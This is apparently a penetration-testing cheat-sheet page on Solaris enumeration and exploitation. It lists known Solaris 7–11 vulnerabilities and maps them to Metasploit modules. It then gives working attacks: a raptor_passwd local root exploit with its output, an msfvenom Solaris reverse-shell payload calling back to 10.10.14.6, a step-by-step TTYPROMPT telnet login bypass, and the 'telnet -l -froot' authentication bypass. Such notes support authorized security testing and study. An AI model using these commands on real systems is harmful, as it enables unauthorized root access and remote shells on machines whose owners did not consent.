Solaris

Information gathering and exploitation

Enumeration

View patches

showrev -p

Installed packages:

Pkginfo OR pkginfo -x

Host information

uname -a

Show IP interface:

Ifconfig -a

Process list:

/usr/ucb/ps -auxww

Patch check analyser

http://www.par.univie.ac.at/solaris/pca/

Patch Check Advanced (PCA) generates lists of installed and missing patches for Oracle Solaris systems and optionally downloads patches. It resolves dependencies between patches and installs them in correct order. It can be the only tool you ever need for patch management, be it on a single machine or a complete network. Just one perl script, it doesn't need compilation nor installation, and it doesn't need root permissions to run. It works on all versions of Solaris, both SPARC and x86.

Usage:

./pca.pl –f . –l missings

will produce a list of missing patches, the following is an example. Note the ‘.’ Represents the current directory so ensure that the three files are in the same directory.

Common Solaris Vulnerabilities

Solaris 7

  • sadmind_exec SADMIND - weakness in default security settings - allows root - rootdown.pl

  • **ttyprompt TELNET - buffer overflow in solaris login - manual through telnet client

  • sendmail_exec LPD - line printer daemon buffer overflow - allows root

  • heap_noir DTSPCD - CDE common desktop environment heap overflow TCP port 6112, runs with root

  • ypupdated_exec YPUPDATED - weakness in handling of the command shell - allows root

  • kcms_readfile kcms / ttdbserverd remote file read (only in msf2)

Solaris 8

  • sadmind_exec SADMIND - weakness in default security settings - allows root - rootdown.pl

  • **ttyprompt TELNET - buffer overflow in solaris login - manual through telnet client

  • sendmail_exec LPD - line printer daemon buffer overflow - allows root

  • heap_noir DTSPCD - CDE common desktop environment heap overflow TCP port 6112, runs with root

  • ypupdated_exec YPUPDATED - weakness in handling of the command shell - allows root.

  • no exploit - sadmind_adm_build_path SADMIND - stack buffer overflow in adm_build_path() function.

  • kcms_readfile kcms / ttdbserverd remote file read (only in msf2)

solaris 9:

  • sadmind_exec SADMIND - weakness in default security settings - allows root - rootdown.pl

  • ypupdated_exec YPUPDATED - weakness in handling of the command shell - allows root.

  • sadmind_adm_build_path SADMIND - stack buffer overflow in adm_build_path() function.

  • kcms_readfile kcms / ttdbserverd remote file read (only in msf2)

Solaris 10

  • fuser TELNET - authentication bypass through -f command - can be manually exploited

  • ypupdated_exec YPUPDATED - weakness in handling of the command shell - allows root.

Solaris 11

  • fuser TELNET - authentication bypass through -f command - can be manually exploited

Exploits

Solaris 8 finger

finger '1 2 3 4 5 6 7 8 9 0'@target

Solaris exploits

https://github.com/0xdea/exploits

raptor_passwd

$ gcc raptor_passwd.c -o passwd -ldl -Wall
$./raptor_passwd p@ssw0rd
raptor_passwd.c - passwd circ() local, Solaris/SPARC 8/9
Copyright (c) 2004 Marco Ivaldi <raptor@0xdeadbeef.info>
Using SI_PLATFORM : SUNW,UltraAX-i2 (5.9)
Using stack base : 0xffbffffc
Using var address : 0xffbffb58
Using rwx_mem address : 0xff3f6004
Using sc address : 0xffbfff9c
Using ff address : 0xffbfff58
Using strcpy() address : 0xff3e0288
"Pai Mei taught you the five point palm exploding heart technique?" -- Bill
"Of course." -- Beatrix Kidd0, alias Black Mamba, alias The Bride (KB Vol2)
# id;uname -a;uptime;
uid=0(root) gid=9610(gengrp) egid=3(sys)
SunOS wks1 5.9 Generic sun4u sparc SUNW,UltraAX-i2
1:53pm up 1 day(s), 16:32, 1 user, load average: 0.00, 0.00, 0.01
#

Msfvenom payload

msfvenom -p solaris/x86/shell_reverse_tcp lhost=10.10.14.6 lport=5555 -f elf > /root/Desktop/raj.elf

TTYPROMPT exploit

Solaris TTYPROMPT Security Vulnerability (Telnet)

This vulnerability is very simple to exploit, since it does not require any code to be compiled by an attacker. The vulnerability only requires the attacker to simply define the environment variable TTYPROMPT to a 6-character string, inside telnet. Jonathan believes this overflows an integer inside login, which specifies whether the user has been authenticated (just a guess).

Once connected to the remote host, you must type the username, followed by 64 " c"s, and a literal "\n". You will then be logged in as the user without any password authentication. This should work with any account except root (unless remote root login is allowed).

Example:

coma% telnet  
telnet> environ define TTYPROMPT abcdef  
telnet> o localhost  
SunOS 5.8  
bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n  
Last login: whenever  
$ whoami bin

Metasploit:

Solaris in.telnetd TTYPROMPT Buffer Overflow

msf > use exploit/solaris/telnet/ttyprompt

Telnet exploit (fuser)

exploits the argument injection vulnerability in the telnet daemon (in.telnetd) of Solaris 10 and 11.

Command line: 

telnet -l "-fbin" target_address 
Or also 
telnet -l "-froot" 192.168.0.1

Metasploit:

msf > use exploit/solaris/telnet/fuser

PreviousExploitationNextIPv6

Last updated